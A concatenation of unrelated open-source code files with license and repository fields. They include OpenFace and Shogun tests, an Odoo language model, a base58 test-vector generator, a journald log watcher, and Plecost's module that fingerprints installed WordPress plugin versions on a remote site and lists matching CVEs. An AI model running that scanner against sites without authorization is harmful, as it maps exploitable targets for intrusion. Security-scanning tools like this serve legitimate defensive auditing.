lfwSubset), "Get lfw-subset by running ./data/download-lfw-subset.sh"
imgWorkDir = tempfile.mkdtemp(prefix='OpenFaceTrainingTest-Img-')
cmd = [sys.executable, os.path.join(openfaceDir, 'util', 'align-dlib.py'),
os.path.join(lfwSubset, 'raw'), 'align', 'outerEyesAndNose',
os.path.join(imgWorkDir, 'aligned')]
p = Popen(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
cmd = [sys.executable, os.path.join(openfaceDir, 'util', 'align-dlib.py'),
os.path.join(lfwSubset, 'raw'), 'align', 'outerEyesAndNose',
os.path.join(imgWorkDir, 'aligned')]
p = Popen(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
netWorkDir = tempfile.mkdtemp(prefix='OpenFaceTrainingTest-Net-')
saveDir = os.path.join(netWorkDir, '1')
cmd = ['th', './main.lua',
'-data', os.path.join(imgWorkDir, 'aligned'),
'-modelDef', '../models/openface/nn4.def.lua',
'-peoplePerBatch', '3',
'-imagesPerPerson', '10',
'-nEpochs', '10',
'-epochSize', '1',
'-cache', netWorkDir,
'-save', saveDir,
'-cuda', '-cudnn', '-testing',
'-nDonkeys', '-1']
p = Popen(cmd, stdout=PIPE, stderr=PIPE,
cwd=os.path.join(openfaceDir, 'training'), universal_newlines=True)
(out, err) = p.communicate()
print(out)
print(err)
assert p.returncode == 0
# Training won't make much progress on lfw-subset, but as a sanity check,
# make sure the training code runs and the mean loss stays below 0.3.
trainLoss = pd.read_csv(os.path.join(saveDir, 'train.log'),
sep='\t').as_matrix()[:, 0]
assert np.mean(trainLoss) < 0.3
shutil.rmtree(imgWorkDir)
shutil.rmtree(netWorkDir)
|
apache-2.0
|
youprofit/shogun
|
examples/undocumented/python_modular/structure_multiclass_bmrm.py
|
15
|
2927
|
#!/usr/bin/env python
import numpy as np
def gen_data(num_classes,num_samples,dim):
np.random.seed(0)
covs = np.array([[[0., -1. ], [2.5, .7]],
[[3., -1.5], [1.2, .3]],
[[ 2, 0 ], [ .0, 1.5 ]]])
X = np.r_[np.dot(np.random.randn(num_samples, dim), covs[0]) + np.array([0, 10]),
np.dot(np.random.randn(num_samples, dim), covs[1]) + np.array([-10, -10]),
np.dot(np.random.randn(num_samples, dim), covs[2]) + np.array([10, -10])];
Y = np.hstack((np.zeros(num_samples), np.ones(num_samples), 2*np.ones(num_samples)))
return X, Y
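# Illustrative shapes (added for clarity): with M=3 classes, N=50 samples per
# class and dim=2, gen_data() returns X of shape (150, 2) and Y of shape
# (150,) with labels 0.0, 1.0 and 2.0.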
# Number of classes
M = 3
# Number of samples of each class
N = 50
# Dimension of the data
dim = 2
traindat, label_traindat = gen_data(M,N,dim)
parameter_list = [[traindat,label_traindat]]
def structure_multiclass_bmrm(fm_train_real=traindat,label_train_multiclass=label_traindat):
from modshogun import MulticlassSOLabels, LabelsFactory
from modshogun import RealFeatures
from modshogun import SOSVMHelper
from modshogun import BMRM, PPBMRM, P3BMRM
from modshogun import MulticlassModel, DualLibQPBMSOSVM, RealNumber
labels = MulticlassSOLabels(label_train_multiclass)
features = RealFeatures(fm_train_real.T)
model = MulticlassModel(features, labels)
sosvm = DualLibQPBMSOSVM(model, labels, 1.0)
# BMRM
sosvm.set_solver(BMRM)
sosvm.set_verbose(True)
sosvm.train()
bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("BMRM: Correct classification rate: %0.2f" % ( 100.0*count/bmrm_out.get_num_labels() ))
#hp = sosvm.get_helper()
#print hp.get_primal_values()
#print hp.get_train_errors()
# PPBMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(PPBMRM)
sosvm.set_verbose(True)
sosvm.train()
ppbmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(ppbmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(ppbmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("PPBMRM: Correct classification rate: %0.2f" % ( 100.0*count/ppbmrm_out.get_num_labels() ))
# P3BMRM
w = np.zeros(model.get_dim())
sosvm.set_w(w)
sosvm.set_solver(P3BMRM)
sosvm.set_verbose(True)
sosvm.train()
p3bmrm_out = LabelsFactory.to_multiclass_structured(sosvm.apply())
count = 0
for i in range(p3bmrm_out.get_num_labels()):
yi_pred = RealNumber.obtain_from_generic(p3bmrm_out.get_label(i))
if yi_pred.value == label_train_multiclass[i]:
count = count + 1
#print("P3BMRM: Correct classification rate: %0.2f" % ( 100.0*count/p3bmrm_out.get_num_labels() ))
return bmrm_out, ppbmrm_out, p3bmrm_out
if __name__=='__main__':
print('SO multiclass model with bundle methods')
a,b,c=structure_multiclass_bmrm(*parameter_list[0])
|
gpl-3.0
|
iniqua/plecost
|
plecost_lib/libs/plugins_utils.py
|
1
|
9305
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Plecost: Wordpress vulnerabilities finder
#
# @url: http://iniqua.com/labs/
# @url: https://github.com/iniqua/plecost
#
# @author:Francisco J. Gomez aka ffranz (http://iniqua.com/)
# @author:Daniel Garcia aka cr0hn (http://www.cr0hn.com/me/)
#
# Copyright (c) 2015, Iniqua Team
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import re
import asyncio
from os.path import join
from functools import partial
from urllib.parse import urljoin
from .data import PlecostPluginInfo
from .utils import colorize, get_diff_ratio, ConcurrentDownloader, get_data_folder
exp = re.compile(r"([Ss]table tag:[\s]*)([\svV]*[0-9\.]+|trunk)")
exp_change_log = re.compile(r"([\=\-]\s*)([\d]+\.[\d]+\.*[\d]*\.*[\d]*\.*[\d]*\.*[\d]*)(\s*[\=\-])")
# ----------------------------------------------------------------------
def _url_generator(url_base, data):
"""
Generate the list of candidate URLs where plugin version information may be found.
:param url_base: Base url where looking for plugins
:type url_base: basestring
:param data: list with plugin info. This list comes from csv iteration. Format:
data[0] => plugin uri
data[1] => plugin name
data[2] => plugin last version
data[3] => CVEs, separated by "|" character.
:type data: list
:return: list of URLs generated
:rtype: list(str)
"""
urls_plugin_regex = {
"readme.txt": exp,
"README.txt": exp,
}
results = []
# Test each URL with possible plugin version info
for target, regex in urls_plugin_regex.items():
_path = "wp-content/plugins/%s/%s" % (data[0], target)
# Make Plugin url
results.append(urljoin(url_base, _path))
return results
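# Illustrative output (hypothetical plugin data, added for clarity): for
# url_base = "http://example.com/" and data = ["akismet", "Akismet", "4.0"],
# _url_generator() returns the two candidate URLs:
# ['http://example.com/wp-content/plugins/akismet/readme.txt',
# 'http://example.com/wp-content/plugins/akismet/README.txt']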
# ----------------------------------------------------------------------
def _plugin_analyze(data_map, error_page, db, log, url, headers, status, content):
"""
Analyze the HTTP response of a plugin URL and extract version and CVE information.
:param data_map: a dict mapping each candidate URL to a list with plugin info. This list comes from csv iteration. Format:
{
plugin_name: [
[0] => plugin uri
[1] => plugin name
[2] => plugin last version
[3] => CVEs, separated by "|" character.
]
}
:type data_map: dict(str: list)
:param error_page: Error page content as raw.
:type error_page: basestring
:param db: cve database instance
:type db: DB
:param log: logging function, as format: log(message, level)
:type log: function
:param url: current plugin URL to analyze
:type url: str
:param headers: dict with HTTP headers response
:type headers: dict
:param status: HTTP status response
:type status: int
:param content: Response of HTTP query
:type content: str
:return: PlecostPluginInfo instance
:rtype: PlecostPluginInfo|None
"""
if content is None:
return None
data = data_map[url]
# Plugin properties
plugin_uri, plugin_name, plugin_last_version = data
# --------------------------------------------------------------------------
# Looking for plugin info
# --------------------------------------------------------------------------
plugin_installed_version = None
if status == 403: # Installed, but inaccessible
plugin_installed_version = "Unknown"
elif status == 200:
# Check that the content is not a generic 'not found' page served with a 200 code
if get_diff_ratio(error_page, content) < 0.52:
# Find the version
tmp_version = exp.search(content)
if tmp_version is not None:
plugin_installed_version = tmp_version.group(2)
# Try to improve version, looking for into changelog
if plugin_installed_version is None or plugin_installed_version == "trunk":
tmp_version_change_log = exp_change_log.search(content)
if tmp_version_change_log is not None:
plugin_installed_version = tmp_version_change_log.group(2)
# Store info
if plugin_installed_version is not None:
# --------------------------------------------------------------------------
# Looking for CVE
# --------------------------------------------------------------------------
cves = db.query_plugin(plugin_uri.replace("_", "-"),
plugin_name,
plugin_installed_version)
plugin = PlecostPluginInfo(current_version=plugin_installed_version,
last_version=plugin_last_version,
plugin_name=plugin_name,
plugin_uri=url,
cves=cves)
text = ("\n <%(symbol)s> Plugin found: %(name)s\n"
" |_Latest version: %(last)s\n"
" |_Installed version: %(curr)s"
) % {
"symbol": colorize("!", "red") if plugin.is_outdated else "i",
"name": colorize(plugin.plugin_name, "blue"),
"last": colorize(plugin.latest_version),
"curr": colorize(plugin.current_version, "red") if plugin.is_outdated else plugin.current_version}
# Print
log(text)
# Print CVE list
if plugin.cves:
log("\n |_CVE list:\n")
for cve in list(set(plugin.cves)):
text = (
" |__%(cve)s: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=%(cve)s)\n"
) % {"cve": colorize(cve, "red")}
log(text)
else:
text = (
"\n |_CVEs: %(text)s"
) % {"text": colorize("NO CVEs found for this plugin",
"green")}
log(text)
return plugin # Plugin found -> no more URL tests for this plugin
else:
return None
# ----------------------------------------------------------------------
@asyncio.coroutine
def plugins_testing(url,
session,
error_page,
log,
data_list,
db,
concurrency=4,
ignore_403=False,
loop=None,
con=None):
"""
Try to find plugins at the remote URL.
:param url: Base url to test the URL list
:type url: str
:param data_list: list of urls to test
:type data_list: list
:param db: cve database instance
:type db: DB
:param concurrency: max concurrency to process URLs
:type concurrency: int
:return: URLs of plugins and if pass check function or not. Format: [("url_to_plugin", True)]
:rtype: list((str, Bool))
"""
if not isinstance(url, str):
raise TypeError("Expected basestring, got '%s' instead" % type(url))
if not isinstance(concurrency, int):
raise TypeError("Expected int, got '%s' instead" % type(concurrency))
# Make URLs
urls = {}
for x in data_list:
for u in _url_generator(url, x):
urls[u] = x
# Map function
fn = partial(_plugin_analyze, urls, error_page, db, log)
# Prepare concurrent connections
cr = ConcurrentDownloader(fn,
session=session,
max_tasks=concurrency,
loop=loop,
ignore_403=ignore_403,
max_redirects=0)
cr.add_url_list(urls)
# Run and wait!
yield from cr.run()
return cr.results
__all__ = ("plugins_testing", )
|
bsd-3-clause
|
djaodjin/drop
|
src/dlogwatch.py
|
1
|
6707
|
#!/usr/bin/env python
#
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse, hashlib, json, logging, re, select, sys
import six, boto3
from six.moves.urllib.parse import urlparse
from systemd import journal
__version__ = None
LOGGER = logging.getLogger(__name__)
APP_NAME = 'djaoapp'
S3_LOGS_BUCKET = 'djaoapp-logs'
PAT = None
exception_start_pat = re.compile(r"ERROR (?P<remote_addr>.+) (?P<username>.+) \[(?P<asctime>.+)\] Internal Server Error: (?P<http_path>.+) \"(?P<http_user_agent>.+)\"")
traceback_start_pat = re.compile(r"^Traceback \(most recent call last\):")
file_lineno_pat = re.compile(r"\s+File \"(?P<filename>.+)\", line (?P<lineno>\d+), in (?P<function>\S+)")
exception_class_pat = re.compile(r"^(?P<exception_type>\S+):\s+\S+")
EXCEPTION_START = 0
TRACEBACK_START = 1
FIRST_FILE_LINENO = 2
FILE_LINENO = 3
STATEMENT = 4
EXCEPTION_CLASS = 5
EXCEPTION_END = 6
msg = None
state = EXCEPTION_START
class EventWriter(object):
def __init__(self, location):
_, self.bucket, prefix = urlparse(location)[:3]
self.prefix = prefix.strip('/')
self.s3_client = boto3.resource('s3')
def write(self, msg):
mod = hashlib.sha256()
mod.update(msg.encode("utf-8"))
key = "%s/%s.json" % (self.prefix, mod.hexdigest())
# print("XXX isolate msg:\n%s***" % str(msg))
LOGGER.info("upload event to s3://%s/%s" % (self.bucket, key))
self.s3_client.Object(self.bucket, key).put(Body=msg)
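# Illustrative behaviour (hypothetical values, added for clarity):
# EventWriter('s3://djaoapp-logs/50x/').write('{"k": 1}') uploads the JSON
# body to s3://djaoapp-logs/50x/<sha256-of-body>.json.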
def append_content(content, writer=None):
global state, msg
if state == EXCEPTION_START:
look = exception_start_pat.match(content)
# print("XXX [EXCEPTION_START] look:%s" % str(look))
if look:
msg = {
'log_level': "ERROR",
'asctime': look.group('asctime'),
'remote_addr': look.group('remote_addr'),
'username': look.group('username'),
'http_path': look.group('http_path'),
'http_user_agent': look.group('http_user_agent'),
'frames': []
}
state = TRACEBACK_START
elif state == TRACEBACK_START:
look = traceback_start_pat.match(content)
if look:
state = FILE_LINENO
elif state == FILE_LINENO:
look = file_lineno_pat.match(content)
if look:
msg['frames'] += [{
'filename': look.group('filename'),
'lineno': look.group('lineno'),
'function': look.group('function')
}]
state = STATEMENT
else:
look = exception_class_pat.match(content)
if look:
msg.update({
'exception_type': look.group('exception_type')
})
msg = json.dumps(msg)
state = EXCEPTION_END
elif state == STATEMENT:
msg['frames'][-1].update({
'context_line': content.strip()
})
state = FILE_LINENO
if state == EXCEPTION_END:
if writer:
writer.write(msg)
msg = None
state = EXCEPTION_START
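# Illustrative walk-through (hypothetical log lines, added for clarity):
# feeding a gunicorn-style traceback line by line drives the state machine
# EXCEPTION_START -> TRACEBACK_START -> FILE_LINENO -> STATEMENT -> ...
# -> EXCEPTION_END, at which point the collected frames are serialized to
# JSON and handed to the writer (or discarded when no writer is given):
#
# append_content('ERROR 10.0.0.1 alice [01/Jan/2020] Internal Server Error: /app "curl"')
# append_content('Traceback (most recent call last):')
# append_content(' File "views.py", line 42, in index')
# append_content(' return render(request)')
# append_content('ValueError: bad value')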
def parse_output(filename, writer):
with open(filename) as filed:
for line in filed.readlines():
append_content(line, writer)
def main(args):
parser = argparse.ArgumentParser(\
usage='%(prog)s [options] command\n\nVersion\n %(prog)s version ' \
+ str(__version__))
parser.add_argument('--version', action='version',
version='%(prog)s ' + str(__version__))
parser.add_argument('-c', '--unit', dest='unit', default=APP_NAME)
parser.add_argument('--location', dest='location',
default='s3://%s/50x/' % S3_LOGS_BUCKET)
parser.add_argument('filenames', nargs='*')
options = parser.parse_args(args[1:])
unit = options.unit
writer = EventWriter(options.location)
if options.filenames:
for filename in options.filenames:
parse_output(filename, writer)
return
global PAT
PAT = re.compile(r'^gunicorn.%(unit)s.app: \[\d+\] ERROR.+\[.+\] ({.+)' % {
'unit': unit})
jctl = journal.Reader()
jctl.add_match(_SYSTEMD_UNIT='%s.service' % unit)
jctl.seek_tail()
jctl.get_previous() # Important! - Discard old journal entries
pctl = select.poll()
pctl.register(jctl, jctl.get_events())
msg = None
while True:
resp = pctl.poll()
if resp and jctl.process() == journal.APPEND:
# If we don't call `jctl.process()`, flags are not reset properly
# and poll does not wait.
# See https://www.freedesktop.org/software/systemd/man/sd_journal_get_events.html
for evt in jctl:
content = evt.get('MESSAGE')
look = PAT.match(content)
if look:
msg = look.group(1)
elif isinstance(msg, six.string_types):
msg += content
else:
msg = None
if msg:
try:
# Validate that the accumulated message is complete JSON
# before handing it to the writer.
json.loads(msg)
if writer:
writer.write(msg)
except (TypeError, ValueError):
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(sys.argv)
|
bsd-2-clause
|
litecoin2/litecoin2
|
contrib/testgen/gen_base58_test_vectors.py
|
1064
|
4344
|
#!/usr/bin/env python
'''
Generate valid and invalid base58 address and private key test vectors.
Usage:
gen_base58_test_vectors.py valid 50 > ../../src/test/data/base58_keys_valid.json
gen_base58_test_vectors.py invalid 50 > ../../src/test/data/base58_keys_invalid.json
'''
# 2012 Wladimir J. van der Laan
# Released under MIT License
import os
from itertools import islice
from base58 import b58encode, b58decode, b58encode_chk, b58decode_chk, b58chars
import random
from binascii import b2a_hex
# key types
PUBKEY_ADDRESS = 48
SCRIPT_ADDRESS = 5
PUBKEY_ADDRESS_TEST = 111
SCRIPT_ADDRESS_TEST = 196
PRIVKEY = 176
PRIVKEY_TEST = 239
metadata_keys = ['isPrivkey', 'isTestnet', 'addrType', 'isCompressed']
# templates for valid sequences
templates = [
# prefix, payload_size, suffix, metadata
# None = N/A
((PUBKEY_ADDRESS,), 20, (), (False, False, 'pubkey', None)),
((SCRIPT_ADDRESS,), 20, (), (False, False, 'script', None)),
((PUBKEY_ADDRESS_TEST,), 20, (), (False, True, 'pubkey', None)),
((SCRIPT_ADDRESS_TEST,), 20, (), (False, True, 'script', None)),
((PRIVKEY,), 32, (), (True, False, None, False)),
((PRIVKEY,), 32, (1,), (True, False, None, True)),
((PRIVKEY_TEST,), 32, (), (True, True, None, False)),
((PRIVKEY_TEST,), 32, (1,), (True, True, None, True))
]
def is_valid(v):
'''Check vector v for validity'''
result = b58decode_chk(v)
if result is None:
return False
for template in templates:
prefix = str(bytearray(template[0]))
suffix = str(bytearray(template[2]))
if result.startswith(prefix) and result.endswith(suffix):
if (len(result) - len(prefix) - len(suffix)) == template[1]:
return True
return False
def gen_valid_vectors():
'''Generate valid test vectors'''
while True:
for template in templates:
prefix = str(bytearray(template[0]))
payload = os.urandom(template[1])
suffix = str(bytearray(template[2]))
rv = b58encode_chk(prefix + payload + suffix)
assert is_valid(rv)
metadata = dict([(x,y) for (x,y) in zip(metadata_keys,template[3]) if y is not None])
yield (rv, b2a_hex(payload), metadata)
def gen_invalid_vector(template, corrupt_prefix, randomize_payload_size, corrupt_suffix):
'''Generate possibly invalid vector'''
if corrupt_prefix:
prefix = os.urandom(1)
else:
prefix = str(bytearray(template[0]))
if randomize_payload_size:
payload = os.urandom(max(int(random.expovariate(0.5)), 50))
else:
payload = os.urandom(template[1])
if corrupt_suffix:
suffix = os.urandom(len(template[2]))
else:
suffix = str(bytearray(template[2]))
return b58encode_chk(prefix + payload + suffix)
def randbool(p = 0.5):
'''Return True with P(p)'''
return random.random() < p
def gen_invalid_vectors():
'''Generate invalid test vectors'''
# start with some manual edge-cases
yield "",
yield "x",
while True:
# kinds of invalid vectors:
# invalid prefix
# invalid payload length
# invalid (randomized) suffix (add random data)
# corrupt checksum
for template in templates:
val = gen_invalid_vector(template, randbool(0.2), randbool(0.2), randbool(0.2))
if random.randint(0,10)<1: # line corruption
if randbool(): # add random character to end
val += random.choice(b58chars)
else: # replace random character in the middle
n = random.randint(0, len(val))
val = val[0:n] + random.choice(b58chars) + val[n+1:]
if not is_valid(val):
yield val,
if __name__ == '__main__':
import sys, json
iters = {'valid':gen_valid_vectors, 'invalid':gen_invalid_vectors}
try:
uiter = iters[sys.argv[1]]
except IndexError:
uiter = gen_valid_vectors
try:
count = int(sys.argv[2])
except IndexError:
count = 0
data = list(islice(uiter(), count))
json.dump(data, sys.stdout, sort_keys=True, indent=4)
sys.stdout.write('\n')
|
mit
|
BT-astauder/odoo
|
openerp/addons/base/res/res_lang.py
|
4
|
11722
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import locale
from locale import localeconv
import logging
import re
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class lang(osv.osv):
_name = "res.lang"
_description = "Languages"
_disallowed_datetime_patterns = tools.DATETIME_FORMATS_MAP.keys()
_disallowed_datetime_patterns.remove('%y') # this one is in fact allowed, just not good practice
def install_lang(self, cr, uid, **args):
"""
This method is called from openerp/addons/base/base_data.xml to load
some language and set it as the default for every partners. The
language is set via tools.config by the RPC 'create' method on the
'db' object. This is a fragile solution and something else should be
found.
"""
lang = tools.config.get('lang')
if not lang:
return False
lang_ids = self.search(cr, uid, [('code','=', lang)])
if not lang_ids:
self.load_lang(cr, uid, lang)
ir_values_obj = self.pool.get('ir.values')
default_value = ir_values_obj.get(cr, uid, 'default', False, ['res.partner'])
if not default_value:
ir_values_obj.set(cr, uid, 'default', False, 'lang', ['res.partner'], lang)
return True
def load_lang(self, cr, uid, lang, lang_name=None):
# create the language with locale information
fail = True
iso_lang = tools.get_iso_codes(lang)
for ln in tools.get_locales(lang):
try:
locale.setlocale(locale.LC_ALL, str(ln))
fail = False
break
except locale.Error:
continue
if fail:
lc = locale.getdefaultlocale()[0]
msg = 'Unable to get information for locale %s. Information from the default locale (%s) has been used.'
_logger.warning(msg, lang, lc)
if not lang_name:
lang_name = tools.ALL_LANGUAGES.get(lang, lang)
def fix_xa0(s):
"""Fix badly-encoded non-breaking space Unicode character from locale.localeconv(),
coercing to utf-8, as some platform seem to output localeconv() in their system
encoding, e.g. Windows-1252"""
if s == '\xa0':
return '\xc2\xa0'
return s
def fix_datetime_format(format):
"""Python's strftime supports only the format directives
that are available on the platform's libc, so in order to
be 100% cross-platform we map to the directives required by
the C standard (1989 version), always available on platforms
with a C standard implementation."""
# For some locales, nl_langinfo returns a D_FMT/T_FMT that contains
# unsupported '%-' patterns, e.g. for cs_CZ
format = format.replace('%-', '%')
for pattern, replacement in tools.DATETIME_FORMATS_MAP.iteritems():
format = format.replace(pattern, replacement)
return str(format)
lang_info = {
'code': lang,
'iso_code': iso_lang,
'name': lang_name,
'translatable': 1,
'date_format' : fix_datetime_format(locale.nl_langinfo(locale.D_FMT)),
'time_format' : fix_datetime_format(locale.nl_langinfo(locale.T_FMT)),
'decimal_point' : fix_xa0(str(locale.localeconv()['decimal_point'])),
'thousands_sep' : fix_xa0(str(locale.localeconv()['thousands_sep'])),
}
lang_id = False
try:
lang_id = self.create(cr, uid, lang_info)
finally:
tools.resetlocale()
return lang_id
def _check_format(self, cr, uid, ids, context=None):
for lang in self.browse(cr, uid, ids, context=context):
for pattern in self._disallowed_datetime_patterns:
if (lang.time_format and pattern in lang.time_format)\
or (lang.date_format and pattern in lang.date_format):
return False
return True
def _get_default_date_format(self, cursor, user, context=None):
return '%m/%d/%Y'
def _get_default_time_format(self, cursor, user, context=None):
return '%H:%M:%S'
_columns = {
'name': fields.char('Name', required=True),
'code': fields.char('Locale Code', size=16, required=True, help='This field is used to set/get locales for user'),
'iso_code': fields.char('ISO code', size=16, required=False, help='This ISO code is the name of po files to use for translations'),
'translatable': fields.boolean('Translatable'),
'active': fields.boolean('Active'),
'direction': fields.selection([('ltr', 'Left-to-Right'), ('rtl', 'Right-to-Left')], 'Direction', required=True),
'date_format':fields.char('Date Format', required=True),
'time_format':fields.char('Time Format', required=True),
'grouping':fields.char('Separator Format', required=True, help="The Separator Format should be like [,n] where 0 < n, starting from the unit digit. -1 will end the separation. E.g. [3,2,-1] will represent 106500 as 1,06,500; [1,2,-1] will represent it as 106,50,0; [3] will represent it as 106,500. ',' is used as the thousands separator in each case."),
'decimal_point':fields.char('Decimal Separator', required=True),
'thousands_sep':fields.char('Thousands Separator'),
}
_defaults = {
'active': 1,
'translatable': 0,
'direction': 'ltr',
'date_format':_get_default_date_format,
'time_format':_get_default_time_format,
'grouping': '[]',
'decimal_point': '.',
'thousands_sep': ',',
}
_sql_constraints = [
('name_uniq', 'unique (name)', 'The name of the language must be unique !'),
('code_uniq', 'unique (code)', 'The code of the language must be unique !'),
]
_constraints = [
(_check_format, 'Invalid date/time format directive specified. Please refer to the list of allowed directives, displayed when you edit a language.', ['time_format', 'date_format'])
]
@tools.ormcache(skiparg=3)
def _lang_data_get(self, cr, uid, lang, monetary=False):
if type(lang) in (str, unicode):
lang = self.search(cr, uid, [('code', '=', lang)]) or \
self.search(cr, uid, [('code', '=', 'en_US')])
lang = lang[0]
conv = localeconv()
lang_obj = self.browse(cr, uid, lang)
thousands_sep = lang_obj.thousands_sep or conv[monetary and 'mon_thousands_sep' or 'thousands_sep']
decimal_point = lang_obj.decimal_point
grouping = lang_obj.grouping
return grouping, thousands_sep, decimal_point
def write(self, cr, uid, ids, vals, context=None):
for lang_id in ids :
self._lang_data_get.clear_cache(self)
return super(lang, self).write(cr, uid, ids, vals, context)
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
languages = self.read(cr, uid, ids, ['code','active'], context=context)
for language in languages:
ctx_lang = context.get('lang')
if language['code']=='en_US':
raise osv.except_osv(_('User Error'), _("Base Language 'en_US' can not be deleted!"))
if ctx_lang and (language['code']==ctx_lang):
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is User's Preferred Language!"))
if language['active']:
raise osv.except_osv(_('User Error'), _("You cannot delete the language which is Active!\nPlease de-activate the language first."))
trans_obj = self.pool.get('ir.translation')
trans_ids = trans_obj.search(cr, uid, [('lang','=',language['code'])], context=context)
trans_obj.unlink(cr, uid, trans_ids, context=context)
return super(lang, self).unlink(cr, uid, ids, context=context)
#
# IDS: can be a list of IDS or a list of XML_IDS
#
def format(self, cr, uid, ids, percent, value, grouping=False, monetary=False, context=None):
""" Format() will return the language-specific output for float values"""
if percent[0] != '%':
raise ValueError("format() must be given exactly one %char format specifier")
formatted = percent % value
# floats and decimal ints need special action!
if grouping:
lang_grouping, thousands_sep, decimal_point = \
self._lang_data_get(cr, uid, ids[0], monetary)
eval_lang_grouping = eval(lang_grouping)
if percent[-1] in 'eEfFgG':
parts = formatted.split('.')
parts[0], _ = intersperse(parts[0], eval_lang_grouping, thousands_sep)
formatted = decimal_point.join(parts)
elif percent[-1] in 'diu':
formatted = intersperse(formatted, eval_lang_grouping, thousands_sep)[0]
return formatted
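# Illustrative call (hypothetical cursor/ids, added for clarity): with
# grouping '[3,0]', thousands_sep ',' and decimal_point '.', calling
# format(cr, uid, [lang_id], '%.2f', 1234567.891, grouping=True)
# returns '1,234,567.89'.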
# import re, operator
# _percent_re = re.compile(r'%(?:\((?P<key>.*?)\))?'
# r'(?P<modifiers>[-#0-9 +*.hlL]*?)[eEfFgGdiouxXcrs%]')
lang()
def split(l, counts):
"""
>>> split("hello world", [])
['hello world']
>>> split("hello world", [1])
['h', 'ello world']
>>> split("hello world", [2])
['he', 'llo world']
>>> split("hello world", [2,3])
['he', 'llo', ' world']
>>> split("hello world", [2,3,0])
['he', 'llo', ' wo', 'rld']
>>> split("hello world", [2,-1,3])
['he', 'llo world']
"""
res = []
saved_count = len(l) # count to use when encountering a zero
for count in counts:
if not l:
break
if count == -1:
break
if count == 0:
while l:
res.append(l[:saved_count])
l = l[saved_count:]
break
res.append(l[:count])
l = l[count:]
saved_count = count
if l:
res.append(l)
return res
intersperse_pat = re.compile('([^0-9]*)([^ ]*)(.*)')
